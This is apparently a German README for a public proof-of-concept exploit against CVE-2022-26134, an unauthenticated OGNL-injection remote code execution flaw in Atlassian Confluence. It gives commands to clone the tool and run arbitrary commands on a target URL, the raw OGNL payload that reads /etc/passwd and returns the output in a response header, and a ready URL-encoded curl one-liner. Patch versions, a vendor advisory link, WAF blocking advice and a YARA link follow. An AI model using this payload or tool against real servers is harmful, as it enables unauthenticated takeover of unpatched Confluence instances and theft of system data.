
Proof-of-Concept-Skript, das die Remote-Codeausführung-Schwachstelle ausnutzt, die Atlassian Confluence 7.18 und niedrigere Versionen betrifft. Die OGNL-Injection-Schwachstelle ermöglicht es einem nicht authentifizierten Benutzer, beliebigen Code auf einer Confluence-Server- oder Data-Center-Instanz auszuführen.
Alle unterstützten Versionen von Confluence Server und Data Center sind betroffen.
Versionen von Confluence Server und Data Center nach 1.3.0 und unter 7.18.1 sind betroffen.
Die Schwachstelle hat einen CVSS-Score von 10 von 10 für Kritikalität.
Repository klonen
git clone https://github.com/Nwqda/CVE-2022-26134
cd CVE-2022-26134
Danach können Sie den Exploit mit einem Befehl Ihrer Wahl wie folgt ausführen:
python3 cve-2022-26134.py https://target.com CMD
python3 cve-2022-26134.py https://target.com id
python3 cve-2022-26134.py https://target.com "ps aux"

${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
Beispiel mit dem CURL-Befehl:
curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D"
Das Ergebnis des Befehls wird dann im Parameter X-Cmd-Response im Antwort-Header angezeigt.
Befolgen Sie die offiziellen Empfehlungen von Atlassian:
https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
Atlassian hat die Versionen 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 und 7.18.1 veröffentlicht, die einen Patch für dieses Problem enthalten.
Diese Schwachstelle betrifft alle selbstgehosteten Instanzen. Wenn Sie eine WAF verwenden, können Sie URLs blockieren, die ${ enthalten.
YARA (von Volexity): https://github.com/volexity/threat-intel/blob/main/2022/2022-06-02%20Active%20Exploitation%20Of%20Confluence%200-day/indicators/yara.yar
NUR FÜR BILDUNGSZWECKE.

Quelle: https://github.com/Nwqda